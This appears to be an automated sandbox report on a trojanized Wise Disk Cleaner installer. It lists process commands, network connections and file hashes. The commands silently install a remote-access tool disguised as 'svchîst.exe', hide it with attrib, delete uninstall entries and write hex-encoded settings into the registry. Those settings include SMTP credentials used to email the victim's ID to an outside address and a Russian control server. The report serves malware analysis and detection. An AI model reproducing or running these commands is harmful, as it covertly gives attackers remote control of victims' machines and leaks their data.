36d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f

C:\Users\Admin\AppData\Local\Temp\is-RO3QC.tmp\CSTask.exe

"C:\Users\Admin\AppData\Local\Temp\is-RO3QC.tmp\CSTask.exe" "WDCSkipUAC" "C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v notification /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d735f696e65745f69645f6e6f74696669636174696f6e2076657273696f6e3d223639313130223e3c73657474696e67735f6170706c6965643e747275653c2f73657474696e67735f6170706c6965643e3c7573655f69645f73657474696e67733e747275653c2f7573655f69645f73657474696e67733e3c67656e65726174655f6e65775f69643e747275653c2f67656e65726174655f6e65775f69643e3c73656e645f746f5f656d61696c3e747275653c2f73656e645f746f5f656d61696c3e3c69643e7b44414144354235352d324438382d344643452d413843442d3137434141363034454143327d3c2f69643e3c67656e65726174655f6e65775f70617373776f72643e66616c73653c2f67656e65726174655f6e65775f70617373776f72643e3c61736b5f6964656e74696669636174696f6e3e66616c73653c2f61736b5f6964656e74696669636174696f6e3e3c73656e743e66616c73653c2f73656e743e3c76657273696f6e3e36393131303c2f76657273696f6e3e3c7075626c69635f6b65795f6d3e3c2f7075626c69635f6b65795f6d3e3c7075626c69635f6b65795f653e3c2f7075626c69635f6b65795f653e3c70617373776f72643e3c2f70617373776f72643e3c696e7465726e65745f69643e3c2f696e7465726e65745f69643e3c646973636c61696d65723e3c2f646973636c61696d65723e3c6f76657277726974655f69645f636f64653e66616c73653c2f6f76657277726974655f69645f636f64653e3c6f76657277726974655f69645f73657474696e67733e66616c73653c2f6f76657277726974655f69645f73657474696e67733e3c69645f637573746f6d5f7365727665725f7573653e66616c73653c2f69645f637573746f6d5f7365727665725f7573653e3c69645f637573746f6d5f7365727665725f616464726573733e3c2f69645f637573746f6d5f7365727665725f616464726573733e3c69645f637573746f6d5f7365727665725f706f72743e353635353c2f69645f637573746f6d5f7365727665725f706f72743e3c69645f637573746f6d5f7365727665725f697076363e66616c73653c2f69645f637573746f6d5f7365727665725f697076363e3c69645f637573746f6d5f7365727665725f7573655f70696e3e66616c73653c2f69645f637573746f6d5f7365727665725f7573655f70696e3e3c69645f637573746f6d5f7365727665725f70696e3e3c2f69645f637573746f6d5f7365727665725f70696e3e3c636f6d70757465725f6e616d653e3c2f636f6d70757465725f6e616d653e3c73656c665f6964656e74696669636174696f6e3e3c2f73656c665f6964656e74696669636174696f6e3e3c736d74705f73657474696e67733e3c686f73743e736d74702e73706163657765622e72753c2f686f73743e3c706f72743e3436353c2f706f72743e3c757365726e616d653e636f70797240636f7274636f6d2e6f6e6c696e653c2f757365726e616d653e3c70617373776f72643e763933396a7734786871537433656d504454484e704b3364356f394d4d5a716b727433576a7a7778394b413d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /silentinstall

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c "C:\Program Files\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\*.*"

C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe

"C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s -r "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\*.*"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c RMDIR /s/q "C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Wise Disk Cleaner 10.3.6.788" /f

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /firewall

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Wise Disk Cleaner 10.3.6.788" /f

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /start

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\SysWOW64\drivers\svchîst.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "C:\Windows\System32\idfgvgjnghcdfb.reg"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "svchîst.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s "install.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s "install.cmd"

C:\Windows\SysWOW64\drivers\svchîst.exe

C:\Windows\SysWOW64\drivers\svchîst.exe -firewall

Network

Country Destination Domain Proto
NL 20.50.201.200:443 tcp
NL 67.26.111.254:80 tcp
NL 67.26.111.254:80 tcp
NL 67.26.111.254:80 tcp
US 13.107.21.200:443 tcp
US 8.8.8.8:53 www.wisecleaner.net udp
US 23.224.25.141:80 www.wisecleaner.net tcp
US 8.8.8.8:53 www.wisecleaner.net udp
US 8.8.8.8:53 info.wisecleaner.com udp
US 104.26.2.143:80 info.wisecleaner.com tcp
US 104.26.2.143:80 info.wisecleaner.com tcp
US 23.224.25.141:80 www.wisecleaner.net tcp
US 8.8.8.8:53 smtp.spaceweb.ru udp
RU 77.222.41.136:25 smtp.spaceweb.ru tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
RU 109.234.156.179:5655 tcp

Files

memory/1800-130-0x0000000000000000-mapping.dmp

memory/528-131-0x0000000000000000-mapping.dmp

memory/5008-132-0x0000000000000000-mapping.dmp

memory/544-133-0x0000000000000000-mapping.dmp

memory/1196-134-0x0000000000000000-mapping.dmp

memory/876-135-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe

MD5 a22b08040d741fb41fc5812996ad3e8f
SHA1 cc684e1c8d24aabeb0eab2763655d3050389c953
SHA256 d42f5676db9952c13cc8955238341956b59ca1dfe6b1afb1c8ca813bb62ddb9c
SHA512 a8d6b75d66a5b79d8b34c2a32acd4b077805e36d187fbd73ba2f4e8e32b92fe42016540314cae516a9687b5a30b74e9f126750ae99035daa2f36eed784a9fe4e

C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe

MD5 a22b08040d741fb41fc5812996ad3e8f
SHA1 cc684e1c8d24aabeb0eab2763655d3050389c953
SHA256 d42f5676db9952c13cc8955238341956b59ca1dfe6b1afb1c8ca813bb62ddb9c
SHA512 a8d6b75d66a5b79d8b34c2a32acd4b077805e36d187fbd73ba2f4e8e32b92fe42016540314cae516a9687b5a30b74e9f126750ae99035daa2f36eed784a9fe4e

memory/4876-138-0x0000000000000000-mapping.dmp

memory/876-139-0x0000000000400000-0x0000000000438000-memory.dmp

memory/4576-140-0x0000000000000000-mapping.dmp

memory/4592-142-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp

MD5 2542d7026b9bbf47242cc3bae8e889e7
SHA1 4c3fc03a3f49f8caa348d4e1b3942a103eeabd0d
SHA256 71a433a0904ade7f442a79d8d69df5400e939b5bc1ba043735e6c5825a024ddf
SHA512 be76671d82fe68f79a90704ebf6c3e199b179cdacfac92e5d8c509215e2c3f9e9a4f70e0fd84373b393ebc80a2a03d5eacd151107d6b2e4e90ce62478506acbb

memory/4632-143-0x0000000000000000-mapping.dmp

memory/876-145-0x0000000000400000-0x0000000000438000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp

MD5 2542d7026b9bbf47242cc3bae8e889e7
SHA1 4c3fc03a3f49f8caa348d4e1b3942a103eeabd0d
SHA256 71a433a0904ade7f442a79d8d69df5400e939b5bc1ba043735e6c5825a024ddf
SHA512 be76671d82fe68f79a90704ebf6c3e199b179cdacfac92e5d8c509215e2c3f9e9a4f70e0fd84373b393ebc80a2a03d5eacd151107d6b2e4e90ce62478506acbb

memory/4252-147-0x0000000000000000-mapping.dmp

memory/1372-148-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\install.exe

MD5 1cd9ee0406b9a04672fdd385ca7631ce
SHA1 5b3b49cd7906676ad46a7b7d192967df6c9ea505
SHA256 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8
SHA512 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7

C:\Windows\SysWOW64\drivers\install.exe

MD5 1cd9ee0406b9a04672fdd385ca7631ce
SHA1 5b3b49cd7906676ad46a7b7d192967df6c9ea505
SHA256 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8
SHA512 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7

C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp

MD5 8708699d2c73bed30a0a08d80f96d6d7
SHA1 684cb9d317146553e8c5269c8afb1539565f4f78
